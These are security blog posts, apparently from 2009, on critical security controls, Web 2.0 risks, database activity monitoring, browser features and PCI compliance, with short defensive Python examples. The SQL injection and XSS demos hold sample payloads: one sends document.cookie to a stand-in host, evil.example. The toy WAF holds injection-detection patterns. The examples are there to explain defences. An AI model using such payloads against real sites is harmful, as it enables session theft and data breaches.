The Center for Strategic & International Studies, a think tank founded in 1962 that focuses on strategic defense and security issues, published a consensus-driven set of "Twenty Critical Controls for Effective Cyber Defense." While aimed at federal agencies, the recommendations are applicable to commercial enterprises as well. Fifteen of the twenty can be validated, at least in part, in an automated manner.
Also of note, the SANS Top Cyber Security Risks report of September 2009 refers to this document as "Best Practices in Mitigation and Control of The Top Risks."
Here are the twenty critical controls:
Inventory of authorized and unauthorized devices
Inventory of authorized and unauthorized software
Secure configurations of hardware and software on laptops, workstations, and servers
Secure configurations for network devices such as firewalls, routers, and switches
Boundary defense
Maintenance, monitoring, and analysis of security audit logs
Application software security
Controlled use of administrative privileges
Controlled access based on need to know
Continuous vulnerability assessment and remediation
Account monitoring and control
Malware defenses
Limitation and control of network ports, protocols, and services
Wireless device control
Data loss prevention
Secure network engineering
Penetration tests and red team exercises
Incident response capability
Data recovery capability
Security skills assessment and appropriate training to fill gaps
I find this document compelling because of its breadth and brevity at only 49 pages. Furthermore, for each control it lays out "Quick Wins … that can help an organization rapidly improve its security stance generally without major procedural, architectural, or technical changes to its environment," and three successively more comprehensive categories of subcontrols.
Every consultant and vendor has a theory about the top cyber security risks. But what's really going on? SANS has the answer. Last week they released their analysis of threat and vulnerability data collected from 6,000 organizations and 9 million systems during the period from March 2009 to August 2009.
SANS says that two threat types dominate the analysis, both of which are tied to Web 2.0:
Threats targeting people who use Web 2.0 applications, i.e. unpatched vulnerabilities on their workstations that are exploited when they visit web sites.
My take: While the hype around NAC has definitely waned, the importance of comprehensive and continuous endpoint discovery, vulnerability analysis, configuration compliance checking, and patching at the application level as well as the operating system level is increasing.
Organizations' Internet-facing web sites remain vulnerable to threats like SQL Injection and Cross-Site Scripting.
My take: It's clear that using a rigorous Software Development Life Cycle process is just not getting the job done. Web application firewalls are a must-have. (A minimal illustration of the underlying injection problem follows.)
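To make the SQL Injection point concrete, here is a minimal sketch, using Python's standard sqlite3 module, of the difference between concatenating user input into a query and binding it as a parameter. The table and the payload are illustrative only; a rigorous SDLC would mandate the parameterized form everywhere.

```python
import sqlite3

# Illustrative in-memory table; names are hypothetical.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'alice@example.com')")

user_input = "alice' OR '1'='1"  # classic SQL injection payload

# Vulnerable: user input is concatenated directly into the SQL statement,
# so the payload rewrites the WHERE clause and returns every row.
vulnerable = conn.execute(
    "SELECT email FROM users WHERE username = '" + user_input + "'"
).fetchall()

# Safer: the driver binds the value as data, not as SQL text,
# so the payload matches nothing.
parameterized = conn.execute(
    "SELECT email FROM users WHERE username = ?", (user_input,)
).fetchall()

print("vulnerable query returned:", vulnerable)        # leaks alice's row
print("parameterized query returned:", parameterized)  # returns []
```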
The Apache.org team published the details of a recent incident in which one of their web sites was breached. While the details are, of course, very technical, they provide a great learning experience for the rest of us. Dan Goodin of The Register summarized the incident.
Unfortunately, most organizations are very reluctant to even admit when they are hacked, let alone share the details of the experience. Hence the various federal and state laws forcing organizations to report incidents where people's personal and/or financial information may have been disclosed.
Given that Apache produces open source software (the number one web server software), it is fitting that they would be so open about a breach.
McKinsey's just-released report on its third annual survey of the usage and benefits of Web 2.0 technology was enlightening as far as it went. However, it completely ignores the IT security risks Web 2.0 creates. Furthermore, traditional IT security products do not mitigate these risks. If we are going to deploy Web 2.0 technology, then we need to upgrade our security to, dare I say, "IT Security 2.0."
Even if Web 2.0 products had no vulnerabilities for cybercriminals to exploit, which is not possible, there would still be the need for a control function, i.e. deciding which applications should be allowed and who should be able to use them. Unfortunately, traditional security vendors have had limited success with both. Fortunately, there are security vendors who have recognized this as an opportunity and have built solutions that mitigate these new risks.
In the past, I had never subscribed to the concept of security enabling innovation, but I do in this case. There is no doubt that improved communication, learning, and collaboration within the organization and with customers and suppliers enhances the organization's competitive position. Ignoring Web 2.0 or letting it happen by itself is not an option. Therefore when planning Web 2.0 projects, we must also include plans for mitigating the new risks Web 2.0 applications create.
The Web 2.0 good news – The survey results are very positive:
"69 percent of respondents report that their companies have gained
measurable business benefits, including more innovative products and
services, more effective marketing, better access to knowledge, lower
cost of doing business, and higher revenues.
Companies that made
greater use of the technologies, the results show, report even greater
benefits. We also looked closely at the factors driving these
improvements—for example, the types of technologies companies are
using, management practices that produce benefits, and any
organizational and cultural characteristics that may contribute to the
gains. We found that successful companies not only tightly integrate
Web 2.0 technologies with the work flows of their employees but also
create a “networked company,” linking themselves with customers and
suppliers through the use of Web 2.0 tools. Despite the current
recession, respondents overwhelmingly say that they will continue to
invest in Web 2.0."
The Web 2.0 bad news – Web 2.0 technologies introduce IT security risks that cannot be ignored. The main risk comes from the fact that these applications are purposely built to bypass traditional IT security controls in order to simplify deployment and increase usage. They use techniques such as port hopping, encrypted tunneling, and browser-based delivery. If we cannot identify these applications and the people using them, we cannot monitor or control them. Any exploitation of vulnerabilities in these applications can go undetected until it's too late.
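To see why port-based controls fall short, consider a minimal sketch of the kind of classification a traditional firewall performs. The port map and flow records are hypothetical; the point is that anything tunneled over port 80 or 443 simply looks like web traffic.

```python
# A traditional firewall's view of the world: port number implies application.
PORT_TO_APP = {80: "web browsing", 443: "SSL web browsing", 25: "smtp"}

# Hypothetical flow records: a file-sharing client tunneling inside SSL on 443
# and a webmail upload riding over plain HTTP on 80.
flows = [
    {"src": "10.1.1.20", "dst_port": 443, "actual_app": "p2p file sharing"},
    {"src": "10.1.1.31", "dst_port": 80,  "actual_app": "webmail attachment upload"},
]

for flow in flows:
    guess = PORT_TO_APP.get(flow["dst_port"], "unknown")
    # The port-based guess says "web browsing" even though the real application
    # is something else entirely, so the traffic is effectively invisible.
    print(f"{flow['src']} -> port {flow['dst_port']}: "
          f"firewall sees '{guess}', actual application is '{flow['actual_app']}'")
```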
A second risk is bandwidth consumption. For example, unauthorized and uncontrolled consumer-oriented video and audio file sharing applications consume large chunks of bandwidth. How much? Hard to know if we cannot see them.
In case we need examples of the bad news, several have appeared in just the last few days; see here, here, here, and here.
The IT Security 2.0 good news – There are new IT Security 2.0 vendors who are addressing these issues in different ways as follows:
Database Activity Monitoring – Since we cannot depend on traditional perimeter defenses, we must protect the database itself. Database encryption is another useful technology, but if someone has stolen authorized credentials (very common with trojan keyloggers), encryption is of no value. I discussed Database Activity Monitoring in more detail here. It's also useful for compliance reporting when integrated with application users.
User Activity Monitoring – Network appliances designed to monitor internal user activity and block actions that are out of policy. Also useful for compliance reporting.
Web Application Firewalls – Web server host-based software or appliances specifically designed to analyze anomalies in browser-based applications. WAFs are not meant to be primary firewalls but rather to monitor the Layer 7 fields of browser-based forms into which users enter information. Cybercriminals enter malicious code which, if not detected and blocked, can trigger a wide range of exploits. WAFs are also useful for PCI compliance. (A minimal sketch of this kind of field inspection appears below.)
"Web 2.0" Firewalls – Next generation network firewalls that can detect and control Web 2.0 applications in addition to traditional firewall functions. They also identify users and can analyze content. They can also perform URL filtering, intrusion prevention, proxying, and data leak prevention. This multi-function capability can be used to generate significant cost reductions by (1) consolidating network appliances and (2) unifying policy management and compliance reporting.
I have heard this type of firewall referred to as an Application Firewall, but that seems confusing to me because it's too close to Web Application Firewall, which I described above and which performs completely different functions. Therefore, I prefer the term Web 2.0 Firewall.
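As a rough illustration of the Layer 7 field inspection a WAF performs, here is a minimal sketch. The patterns are a tiny, hypothetical subset of what real products use (which combine large signature sets with anomaly scoring), so treat it as a teaching aid, not a rule base.

```python
import re

# A tiny, hypothetical subset of the kinds of patterns a WAF matches against
# form fields; real products use far richer signatures plus anomaly scoring.
SUSPICIOUS_PATTERNS = [
    re.compile(r"(?i)<\s*script"),                 # script tag injection (XSS)
    re.compile(r"(?i)\bunion\b.+\bselect\b"),      # SQL UNION-based injection
    re.compile(r"(?i)['\"]\s*or\s+\d+\s*=\s*\d+"), # ' OR 1=1 style payloads
]

def inspect_form(fields):
    """Return the names of form fields whose values match a suspicious pattern."""
    flagged = []
    for name, value in fields.items():
        if any(p.search(value) for p in SUSPICIOUS_PATTERNS):
            flagged.append(name)
    return flagged

# Example POST body as a WAF might see it.
submitted = {
    "username": "bob",
    "comment": "<script>document.location='http://evil.example'</script>",
}
print(inspect_form(submitted))  # ['comment'] - block or log the request
```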
In conclusion, Web 2.0 is real and IT Security 2.0 must be part of Web 2.0 strategy. Put another way, IT Security 2.0 enables Web 2.0.
Computerworld reported last week that a judge in Illinois ruled that a couple who lost $26,500 when their bank account was breached can sue the bank for negligence for not implementing "state-of-the-art" security measures which would have prevented the breach.
While bank credit card issuers have been suing credit card processors and retailers regularly to recoup losses due to breaches, this is the first case I am aware of in which a judge has ruled that a customer can sue the bank for negligence.
The more detailed blog post by attorney David Johnson, upon which the Computerworld article is based, discusses some really interesting details of this case.
The plaintiffs sued Citizens Financial Bank for negligence because it had not implemented multifactor authentication. The timeline is important here. The Federal Financial Institutions Examination Council (FFIEC) issued multifactor authentication guidelines in 2005. By 2007, when the plaintiffs' breach occurred, the bank had still not implemented multifactor authentication. The judge, Rebecca Pallmeyer of the U.S. District Court for the Northern District of Illinois, found this two-year delay unacceptable.
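For readers who have not seen a second factor in action, here is a minimal sketch of a time-based one-time password of the kind standardized in RFC 6238 and used by many banking tokens. The shared secret is illustrative; real deployments also handle provisioning, clock drift, and rate limiting.

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(shared_secret_b32: str, interval: int = 30, digits: int = 6) -> str:
    """Compute a time-based one-time password (RFC 6238, HMAC-SHA1)."""
    key = base64.b32decode(shared_secret_b32)
    counter = int(time.time()) // interval           # 30-second time step
    msg = struct.pack(">Q", counter)                 # 8-byte big-endian counter
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                       # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

# Illustrative only: the bank and the customer's token share this secret.
SECRET = "JBSWY3DPEHPK3PXP"
print("one-time password:", totp(SECRET))
# A stolen static password alone is no longer enough; the attacker also
# needs the current code, which changes every 30 seconds.
```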
Two interesting complications – (1) The account from which the money was stolen was a home equity line of credit account, not a deposit or consumer asset account. (2) This credit account was linked to the plaintiffs' business checking account. I discussed the differences between consumer and business account liability here. Fortunately for the plaintiffs, the judge brushed these issues aside and focused on the lack of multifactor authentication.
One issue that was not addressed – where was Fiserv in all of this? They are the provider of the online banking software used by Citizens Financial Bank. Were they offering some type of multifactor authentication? I would assume yes, although I have not been able to confirm this.
In conclusion, attorney David Johnson makes clear that this ruling increases the risk to banks (and possibly other organizations responsible for protecting money and/or other assets of value) if they do not implement state-of-the-art security measures.
In the last week, vulnerabilities in older versions of WordPress software have been exploited, resulting in blog posts being deleted and blog sites being used for malicious purposes. Welcome to the real world.
The shock that some people are expressing, like Robert Scoble on Scobleizer, is somewhat surprising. It's clear that WordPress knew about the vulnerabilities for some time and urged self-hosting customers to upgrade to WordPress version 2.8.4. Some of those who did not have paid the price. Here is some additional useful information.
People have been snickering for years about Microsoft's security travails. We have since learned that Microsoft does not have a monopoly on security vulnerabilities and exploits. All software products have vulnerabilities. The issue is that as a software product becomes popular, it attracts cybercriminals. Therefore, software companies, as they become successful, must increase their focus on security issues, which WordPress seems to have done.
And we as consumers of software have risk management responsibilities too:
Upgrading to current releases
Backing up regularly to increase resiliency, i.e. the ability to recover quickly from an attack (a minimal backup sketch follows this list).
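Here is a minimal sketch of the second point. The paths are hypothetical, and a real WordPress backup would also dump the database (for example with mysqldump); the idea is simply that recovery is only as good as the most recent copy.

```python
import tarfile
import time
from pathlib import Path

# Hypothetical locations - adjust for your own installation.
SITE_DIR = Path("/var/www/wordpress")
BACKUP_DIR = Path("/var/backups/wordpress")

def backup_site() -> Path:
    """Write a timestamped, compressed archive of the site directory."""
    BACKUP_DIR.mkdir(parents=True, exist_ok=True)
    archive = BACKUP_DIR / time.strftime("wordpress-%Y%m%d-%H%M%S.tar.gz")
    with tarfile.open(archive, "w:gz") as tar:
        tar.add(SITE_DIR, arcname=SITE_DIR.name)
    return archive

if __name__ == "__main__":
    # Run from cron (e.g. nightly) so a compromise or botched upgrade
    # costs at most a day of content.
    print("wrote", backup_site())
```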
Roger Grimes at InfoWorld's Security Central wrote a very good article about password management. I agree with everything he said, except that Roger did not go far enough. For several of Roger's attack types (password guessing, keystroke logging, and hash cracking), one of the mitigation techniques is strong (high-entropy) passwords.
True enough. However, I am convinced that it's simply not possible to memorize really strong (high-entropy) passwords.
I wrote about this earlier and included a link to a review of password managers.
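To make the entropy argument concrete, here is a minimal sketch using Python's secrets module. A uniformly random password has entropy equal to its length times log2 of the alphabet size, so 16 characters drawn from roughly 94 printable symbols is about 105 bits, which is well beyond what most people can memorize without a password manager.

```python
import math
import secrets
import string

ALPHABET = string.ascii_letters + string.digits + string.punctuation  # 94 symbols

def generate_password(length: int = 16) -> str:
    """Generate a high-entropy random password."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

def entropy_bits(length: int, alphabet_size: int = len(ALPHABET)) -> float:
    """Entropy of a uniformly random password: length * log2(alphabet size)."""
    return length * math.log2(alphabet_size)

pw = generate_password()
print(f"password: {pw}")
print(f"entropy: {entropy_bits(len(pw)):.0f} bits")  # ~105 bits for 16 chars
```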
The browser vendors are adding innovative security features to help protect users against web-based attacks. Here are some examples:
Firefox 3.5.3 will check your Adobe Flash add-on and warn you if it's not current. It is believed that as many as 80% of browser users are running older versions of Flash that contain vulnerabilities fixed in newer versions.
Internet Explorer 8 added a raft of security features including URL filtering, Cross Site Scripting (XSS) filtering, click-jack prevention, domain highlighting, and data execution prevention (requires Vista SP1). The Cross Site Scripting filter is very impressive. Here is a detailed explanation of XSS and how the IE8 filter works. XSS attacks are particularly nasty because they can happen through no fault of yours; all you have to do is visit a site that has been successfully exploited. (A minimal illustration of the attack and the standard output-encoding defense appears after this list.) Details on the other features are here.
Opera 10, just now shipping, also includes URL filtering.
Safari 4, when running on Windows, will integrate with your Windows anti-virus software to check any files, images, or other items you are downloading via Safari. It also has URL filtering watching for phishing sites and sites known to harbor malware.
Chrome 2.0.172.43 was released on August 25, 2009 and fixed several high severity issues.
Firefox has long benefited from third-party security and privacy add-ons. NoScript is one of the more popular add-ons; it blocks JavaScript and lets you selectively turn JavaScript back on per content source.
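To illustrate the class of attack the IE8 filter targets, here is a minimal sketch of a reflected payload and the standard server-side defense, output encoding. The page snippet and payload are hypothetical.

```python
import html

# A comment submitted by an attacker to a vulnerable page.
user_comment = (
    "<script>new Image().src="
    "'http://evil.example/steal?c='+document.cookie</script>"
)

# Vulnerable: the raw value is pasted into the page, so every visitor's
# browser executes the attacker's script.
unsafe_page = "<p>Latest comment: " + user_comment + "</p>"

# Safer: HTML-encode user-supplied data before it reaches the page, so the
# browser renders the payload as harmless text instead of executing it.
safe_page = "<p>Latest comment: " + html.escape(user_comment) + "</p>"

print(unsafe_page)
print(safe_page)
```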
While I have not personally checked these security features, assuming they all work as advertised, Microsoft's Internet Explorer 8 leads the way in security innovation.
I thought a post about Database Activity Monitoring was timely because one of the DAM vendors, Sentrigo, published a Microsoft SQL Server vulnerability today along with a utility that mitigates the risk. Also of note, Microsoft denies that this is a real vulnerability.
I generally don't like to write about a single new vulnerability because there are just so many of them. However, Adrian Lane, CTO and Analyst at Securosis, wrote a detailed post about this new vulnerability, Sentrigo's workaround, and Sentrigo's DAM product, Hedgehog. Therefore I wanted to put this in context.
Database Activity Monitoring is becoming a key component in a defense-in-depth approach to protecting "competitive advantage" information like intellectual property and customer and financial information, and to meeting compliance requirements.
One of the biggest issues organizations face when selecting a Database Activity Monitoring solution is the method of activity collection, of which there are three – logging, network-based monitoring, and agent-based monitoring. Each has pros and cons:
Logging – This requires turning on the database product's native logging capability. The main advantage of this approach is that it is a standard feature included with every database. Also, some database vendors like Oracle have a complete, but separately priced, Database Activity Monitoring solution, which they claim will support other databases. Here are the issues with logging:
You need a log management or Security Information and Event Management (SIEM) system to normalize each vendor's log format into a standard format so you can correlate events across different databases and store the large volume of events that are generated (a minimal normalization sketch appears after this list). If you have already committed to a SIEM product, this might not be an issue, assuming the SIEM vendor does a good job with database logs.
There can be significant performance overhead on the database associated with logging, possibly as high as 50%.
Database administrators can tamper with the logs. Also if an external hacker gains control of the database server, he/she is likely to turn logging off or delete the logs.
Logging is not a good alternative if you want to block out-of-policy actions. Logging is after the fact and cannot be expected to block malicious activity. While SIEM vendors may have the ability to take actions, by the time the events are processed by the SIEM, seconds or minutes have passed, which means the exploit could already be complete.
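As a minimal sketch of the normalization work a SIEM does with database logs, consider two hypothetical vendor formats mapped to one common event schema. The formats below are stand-ins, not actual Oracle or SQL Server audit output.

```python
import re
from datetime import datetime

# Hypothetical audit-log formats for two different database products.
VENDOR_PATTERNS = {
    "vendor_a": re.compile(
        r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
        r"user=(?P<user>\S+) action=(?P<action>\S+) object=(?P<obj>\S+)"
    ),
    "vendor_b": re.compile(
        r"(?P<ts>\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\|"
        r"(?P<user>[^|]+)\|(?P<action>[^|]+)\|(?P<obj>[^|]+)"
    ),
}
TS_FORMATS = {"vendor_a": "%Y-%m-%d %H:%M:%S", "vendor_b": "%m/%d/%Y %H:%M:%S"}

def normalize(vendor: str, line: str) -> dict:
    """Map one vendor-specific audit line to a common event schema."""
    m = VENDOR_PATTERNS[vendor].match(line)
    if not m:
        raise ValueError(f"unrecognized {vendor} log line: {line!r}")
    return {
        "timestamp": datetime.strptime(m.group("ts"), TS_FORMATS[vendor]),
        "db_user": m.group("user").strip(),
        "action": m.group("action").strip().upper(),
        "object": m.group("obj").strip(),
        "source": vendor,
    }

print(normalize("vendor_a", "2009-09-15 14:02:11 user=appuser action=select object=customers"))
print(normalize("vendor_b", "09/15/2009 14:02:12|dba1|DROP|audit_trail"))
```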
Network based – An appliance is connected to a tap or a span port on the switch that sits in front of the database servers. Traffic to and, in most cases, from the databases is captured and analyzed. Clearly this puts no performance burden on the database servers at all. It also provides a degree of isolation from the database administrators. Here are the issues:
Local database calls and stored procedures are not seen. Therefore you have an incomplete picture of database activity.
You must have the network infrastructure to support these appliances.
It can get expensive depending on how many databases you have and how geographically dispersed they are.
Host based – An agent is installed directly on each database server. The overhead is much lower than with native database logging, as low as 1% to 5%, although you should test this for yourself. Also, the agent sees everything, including stored procedures. Database administrators will have a hard time interfering with the process without being noticed. Deployment is simple, i.e. neither the networking group nor the datacenter team needs to be involved. Finally, the installation process should not require a database restart. As for disadvantages, this is where Adrian Lane's analysis comes in. Here are his concerns:
Building and maintaining the agent software is difficult and more time consuming for the vendor than the network approach. However, this is the vendor's issue, not the user's.
The analysis is performed by the agent right on the database server. This could mean additional overhead, but it has the advantage of being able to block a query that is not "in policy" (a minimal sketch of this kind of policy check appears below).
Under heavy load, transactions could be missed. But even if this is true, it's still better than the network based approach which surely misses local actions and stored procedures.
IT administrators could use the agent to snoop on database transactions to which they would not normally have access.
Dan Sarel, Sentrigo's Vice President of Product, responded in the comments section of Adrian Lane's post. (Unfortunately there is no dedicated link to the response; you just have to scroll down to it.) He addressed the "losing events under heavy load" issue by saying Sentrigo has customers processing heavy loads without losing transactions. He addressed the IT administrator snooping issue by saying that the Sentrigo sensors do not require database credentials; therefore database passwords are not available to IT administrators.
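To make the "in policy" idea concrete, here is a minimal sketch of the kind of rule evaluation an agent could apply before a statement executes. This is not Sentrigo's implementation; the roles, tables, and rules are hypothetical.

```python
import re

# Hypothetical policy: which statement types each database role may run,
# and sensitive tables that only explicitly trusted roles may touch.
ALLOWED_STATEMENTS = {
    "app_user": {"SELECT", "INSERT", "UPDATE"},
    "reporting": {"SELECT"},
    "dba": {"SELECT", "INSERT", "UPDATE", "DELETE", "ALTER", "DROP"},
}
RESTRICTED_TABLES = {"credit_cards": {"app_user"}}  # table -> roles allowed to touch it

def evaluate(role: str, sql: str) -> str:
    """Return 'allow' or 'block' for a statement issued under the given role."""
    statement = sql.strip().split(None, 1)[0].upper()
    if statement not in ALLOWED_STATEMENTS.get(role, set()):
        return "block"                  # e.g. a reporting user issuing a DELETE
    for table, allowed_roles in RESTRICTED_TABLES.items():
        if re.search(rf"\b{table}\b", sql, re.IGNORECASE) and role not in allowed_roles:
            return "block"              # sensitive table touched by the wrong role
    return "allow"

print(evaluate("app_user", "SELECT card_number FROM credit_cards WHERE id = 7"))  # allow
print(evaluate("reporting", "SELECT card_number FROM credit_cards"))              # block
print(evaluate("reporting", "DELETE FROM orders"))                                # block
```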
Controversy around the PCI DSS compliance program increased recently when Robert Carr, the CEO of Heartland Payment Systems, attacked his QSAs in a CSO Online article, saying, "The audits done by our QSAs (Qualified Security Assessors) were of no value whatsoever. To the extent that they were telling us we were secure beforehand, that we were PCI compliant, was a major problem."
Mike Rothman, Senior VP of eIQNetworks, responded to Mr. Carr's comments not so much to defend PCI but to place PCI in perspective, i.e. compliance does not equal security. I discussed this myself in my post about the 8 Dirty Secrets of IT Security, specifically in my comments on Dirty Secret #6 – Compliance Threatens Security.
Eric Ogren, a security industry analyst, continued the attack on PCI in his article in SearchSecurity last week, where he said, "The federal indictment this week of three men for their roles in the largest data security breach in U.S. history also serves as an indictment of sorts against the fraud conducted by PCI – placing the burden of security costs onto retailers and card processors when what is really needed is the payment card industry investing in a secure business process."
The federal indictment to which Eric Ogren referred was that of Albert Gonzalez and others for the breaches at Heartland Payment Systems, 7-Eleven, Hannaford, and two national retailers referred to as Company A and Company B. Actually, this is the second federal indictment of Albert Gonzalez that I am aware of. The first, filed in Massachusetts in August 2008, was for the breaches at BJ's Wholesale Club, DSW, OfficeMax, Boston Market, Barnes & Noble, Sports Authority, and TJX.
Bob Russo, the general manager of the PCI Security Standards Council disagreed with Eric Ogren's characterizations of PCI, saying that retailers and credit card processors must take responsibility for protecting cardholder information.
Rich Mogull, CEO and Analyst at Securosis, responded to Bob Russo's article with recommendations to improve the PCI compliance program, which he characterized as an "overall positive development for the state of security." He went on to say, "In other words, as much as PCI is painful, flawed, and ineffective, it has also done more to improve security than any other regulation or industry initiative in the past 10 years. Yes, it's sometimes a distraction; and the checklist mentality reduces security in some environments, but overall I see it as a net positive."
Rich Mogull seems to agree with Eric Ogren that the credit card companies have the responsibility and the power to improve the technical foundations of credit card transactions. In addition, he takes the PCI Council to task for issues such as:
incomplete and/or weak compliance requirements
QSA shopping
the conflict of interest created by allowing QSAs to perform audits and then sell security services based on the findings of those audits.
Clearly organizations have no choice but to comply with mandatory regulations. But the compliance process must be part of an overall risk management process. In other words, the compliance process is not equal to the risk management process but a component of it.
Finally, and most importantly, the enterprise risk management process must be more agile and responsive to new security threats than a bureaucratic regulatory body can be. For example, it may be some time before the PCI standards are updated to specify that firewalls must be able to work at the application level so that all the Web 2.0 applications traversing the enterprise network can be controlled. This is an important issue today, as this has been a major vector for compromising systems that are then used for funds transfer fraud.